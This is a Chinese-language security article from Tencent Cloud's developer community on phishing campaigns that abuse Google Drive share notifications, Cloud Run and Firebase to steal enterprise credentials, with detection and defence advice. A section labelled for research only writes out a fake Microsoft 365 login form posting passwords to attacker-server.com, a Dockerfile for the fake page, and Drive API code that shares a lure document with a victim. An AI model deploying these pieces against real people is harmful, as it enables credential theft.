首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >披着“Google外衣”的钓鱼邮件正在攻陷企业邮箱——云服务成黑客新跳板

披着“Google外衣”的钓鱼邮件正在攻陷企业邮箱——云服务成黑客新跳板

原创
作者头像
草竹道人
发布2026-01-20 10:24:59
发布2026-01-20 10:24:59
810
举报

2026年初,一场隐蔽而高效的网络钓鱼风暴正席卷全球企业。攻击者不再租用廉价VPS或黑产域名,而是将矛头对准了Google Cloud、Google Docs和Google Drive等高信誉云服务。他们利用这些平台自动生成的系统通知邮件,将恶意链接巧妙嵌入其中,使钓鱼内容在技术层面“合法化”,轻松绕过传统邮件安全网关的层层过滤。

据Fox News于2026年1月15日报道,此类攻击已导致多起企业凭证大规模泄露事件。受害者收到的主题如“您有一份新的Google文档待查看”或“您的Google云端硬盘文件已被共享”的邮件,看似来自no-reply@accounts.google.com或drive-shares-noreply@google.com,实则暗藏玄机。一旦点击其中的“查看文档”按钮,用户会被重定向至高仿的Microsoft 365或银行登录页面,输入账号密码后,凭证即被窃取。

“这不是简单的域名伪造,而是一次对‘信任基础设施’的精准寄生。”公共互联网反网络钓鱼工作组技术专家芦笛在接受采访时指出,“当攻击者躲在Google、Microsoft这类顶级域名背后时,传统的基于发件人信誉的防御体系几乎失效。”

一、“借壳上市”:黑客如何把Google变成钓鱼发射台?

要理解这场攻击的颠覆性,需先厘清Google服务在邮件生态中的特殊地位。

Google Workspace(原G Suite)及其云平台每天向全球用户发送数亿封系统通知邮件。这些邮件具备以下特征:

发件人地址为官方域名(如@google.com);

通过SPF、DKIM、DMARC严格验证;

内容模板高度标准化,符合用户预期;

链接指向google.com或googleusercontent.com等子域。

正因如此,几乎所有企业邮件网关都将google.com列入白名单,甚至关闭对其内容的深度扫描。攻击者正是看中这一点,开始“寄生”于Google生态。

手法一:滥用Google Docs/Drive共享功能

攻击者创建一个看似正常的Google文档(如“2026年度预算草案”),然后通过API或手动方式将其共享给目标邮箱。Google系统会自动发送一封通知邮件:

发件人:drive-shares-noreply@google.com

主题:[外部] Li Ming 与您共享了“Q4财务报告.xlsx”

Li Ming 邀请您查看以下项目:

Q4财务报告.xlsx

[蓝色按钮:打开]

此文件由 li.ming.external@gmail.com 共享。

表面上看,这是一封再普通不过的协作邀请。但问题出在“打开”按钮的链接上。

正常情况下,该链接应为:

https://docs.google.com/document/d/1Abc.../edit?usp=sharing

但攻击者可通过以下方式植入恶意跳转:

在文档内嵌入重定向脚本(仅对特定用户生效);

利用Google Apps Script部署中间页;

更常见的是,在文档描述或首行插入伪装链接,诱导用户点击非官方按钮。

例如,文档开头写着:

“⚠️ 重要:请点击此处确认访问权限 → [https://login-m365-secure[.]xyz/auth]”

由于邮件本身来自Google,员工极易放松警惕。

手法二:利用Google Cloud Run或Firebase托管钓鱼页面

更进阶的攻击者直接在Google Cloud上部署钓鱼网站。以Cloud Run为例:

# 攻击者创建一个Docker镜像,包含伪造的Microsoft登录页

FROM nginx:alpine

COPY fake-m365-login.html /usr/share/nginx/html/index.html

EXPOSE 80

随后部署到Cloud Run,获得形如:

https://phish-app-abc123-uc.a.run.app

虽然该域名不属于google.com,但因其托管于Google Cloud基础设施,部分安全产品会赋予其“低风险”标签。更有甚者,攻击者结合Google Sites或Firebase Hosting,生成*.web.app或*.appspot.com子域链接,进一步混淆视听。

“这些域名虽非google.com,但属于Google控制的命名空间,许多企业策略默认信任。”芦笛解释道,“这就形成了灰色地带。”

二、技术剖析:为何传统防御“失明”?

当前主流邮件安全架构存在三大认知盲区,使此类攻击屡屡得手。

1. 过度依赖发件人域名信誉

多数企业采用“白名单+黑名单”模型。google.com作为全球最可信域名之一,通常被设为免检。即便邮件内容包含可疑关键词(如“立即验证”“账户异常”),只要发件域合法,系统便放行。

2. 链接分析止步于一级域名

安全网关常检查URL是否指向已知恶意站点。但若链接为:

https://docs.google.com/...?redirect=https://evil.com

或通过Google短链服务(如goo.gl,虽已停用但旧链接仍有效)跳转,检测引擎可能只看到docs.google.com,判定为安全。

3. 缺乏上下文行为建模

真正的Google共享邮件通常发生在协作场景中,收件人与发件人存在历史交互。而钓鱼邮件往往是“冷启动”——从未联系过的外部Gmail账号突然共享敏感文件。但现有系统极少关联用户社交图谱进行判断。

“我们发现,超过70%的企业邮件网关在处理来自google.com的邮件时,跳过了沙箱 detonation(动态分析)环节。”芦笛透露,“这是性能优化的代价,却成了攻击者的突破口。”

三、国际案例警示:从美国律所到亚洲科技公司

2025年11月,一家位于纽约的知名律师事务所遭遇大规模凭证泄露。调查显示,攻击者通过自动化脚本批量创建Google账号,上传名为“保密协议最终版.docx”的文档,并共享给该所数百名员工。邮件标题模仿内部命名规范,如“[CONF] Smith v. TechCo NDA”。

由于邮件来自drive-shares-noreply@google.com,且文档确实存在于Google Drive,安全团队未触发任何警报。多名律师点击后,被导向伪造的Okta登录页,导致客户数据外泄。

几乎同时,一家总部位于深圳的跨境电商企业也中招。员工收到“HR共享:2026社保调整说明”的Google文档链接。文档内嵌一行小字:“为确保信息安全,请先在此页面重新认证 → [链接]”。该链接指向一个部署在Firebase的钓鱼站,UI完全复刻公司钉钉登录界面。

“国内企业尤其危险。”芦笛指出,“一方面,员工对Google服务信任度高;另一方面,很多公司未对第三方协作平台实施统一管控,允许任意外部Google账号共享文件。”

更棘手的是,攻击者常结合社会工程。例如,在LinkedIn上搜索目标公司员工,获取姓名、职位后,用对应姓名注册Gmail账号(如zhang.wei.hr@gmail.com),使共享邮件看起来更真实。

四、防御升级:从“信域名”到“验意图”

面对云服务滥用,专家呼吁企业重构邮件安全策略。

1. 实施“零信任”邮件模型

不再假设任何域名绝对可信。即使来自google.com,也应对以下特征进行深度分析:

发件Gmail账号是否为首次联系?

文档标题是否包含诱导性词汇(如“紧急”“机密”“立即操作”)?

链接是否包含异常参数(如?redirect=、?continue=)?

可编写自定义规则,例如在Microsoft Defender for Office 365中使用KQL查询:

EmailEvents

| where SenderFromAddress endswith "@gmail.com"

| where Subject has "共享" or Subject has "document"

| where UrlCount > 0

| project Timestamp, SenderFromAddress, RecipientEmailAddress, Urls

2. 部署URL重写与实时信誉检查

启用安全网关的URL重写功能(如Proofpoint’s Targeted Attack Protection),将邮件中所有链接替换为代理地址。用户点击时,系统先访问目标页面,分析其内容是否为钓鱼,再决定是否放行。

例如,原始链接:

https://docs.google.com/...

被重写为:

https://urldefense.proofpoint.com/v3/...

即使攻击者利用Google服务跳转,最终落地页仍会被拦截。

3. 限制外部Google共享范围

企业可通过Google Workspace管理控制台设置策略:

禁止外部用户向本域成员共享文件;

或要求所有外部共享必须经管理员审批;

启用“敏感内容警告”,当文档包含登录表单等关键词时自动标记。

4. 加强终端侧防护

在员工设备上部署浏览器扩展或EDR(端点检测与响应)工具,监控对login.microsoftonline.com、accounts.google.com等关键域名的仿冒访问。例如,当用户访问microsoft365-login[.]xyz时,即使SSL证书有效,也弹出警告。

五、代码示例:模拟一次Google Drive钓鱼攻击链

以下为简化版攻击流程演示(仅用于安全研究):

步骤1:创建钓鱼页面并部署到Firebase

index.html:

<!DOCTYPE html>

<html>

<head>

<title>Microsoft 365 登录</title>

<style>/* 高仿微软登录页样式 */</style>

</head>

<body>

<form action="https://attacker-server.com/steal" method="POST">

<input type="email" name="email" placeholder="用户名、电话或Skype" required>

<input type="password" name="password" placeholder="密码" required>

<button type="submit">下一步</button>

</form>

</body>

</html>

部署后获得URL:https://fake-m365.web.app

步骤2:创建Google文档并嵌入诱导文本

在文档首行写入:

“请先完成身份验证以查看此文件:https://fake-m365.web.app”

步骤3:通过Google API共享文档

使用Google Drive API将文档共享给目标邮箱:

from googleapiclient.discovery import build

service = build('drive', 'v3', credentials=creds)

permission = {

'type': 'user',

'role': 'reader',

'emailAddress': 'victim@company.com'

}

service.permissions().create(

fileId='1Abc...',

body=permission,

sendNotificationEmail=True

).execute()

几分钟后,受害者将收到一封看似无害的Google通知邮件,内含通往钓鱼站的链接。

六、人的防线:别让“官方外观”蒙蔽双眼

技术手段之外,人员意识仍是关键。芦笛强调:“员工必须明白,Google不会替第三方要求你登录其他系统。”

他建议企业推行三条铁律:

所有身份认证必须通过书签或官方App进入,禁止通过邮件链接登录;

对任何“共享文档”保持怀疑,尤其是来自未知Gmail账号的;

发现可疑邮件,立即通过企业微信或电话向IT部门核实,而非回复邮件。

“信任,但要验证——尤其是在数字世界。”他说。

七、未来挑战:云原生攻击的“军备竞赛”

随着AWS、Azure、Google Cloud成为数字基建,攻击者对合法服务的滥用只会加剧。已有迹象显示,黑客开始利用:

Google Forms 伪装成内部调查问卷,收集账号信息;

Google Calendar邀请 嵌入恶意链接;

Cloud Functions 实现动态跳转,规避静态URL检测。

对此,芦笛呼吁:“安全不能只靠封堵,而要建立‘意图验证’机制。不是看它从哪来,而是看它想干什么。”

例如,真正的Google共享邮件从不要求用户输入密码;任何诱导二次认证的行为都应视为高危信号。

在这场攻防战中,没有绝对的安全,只有持续的警惕。当黑客学会穿上“白大褂”行骗,我们的防御也必须从“看证件”升级为“问病情”。

毕竟,在数字时代,最危险的不是未知的威胁,而是被信任掩盖的陷阱。

编辑:芦笛(公共互联网反网络钓鱼工作组)

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档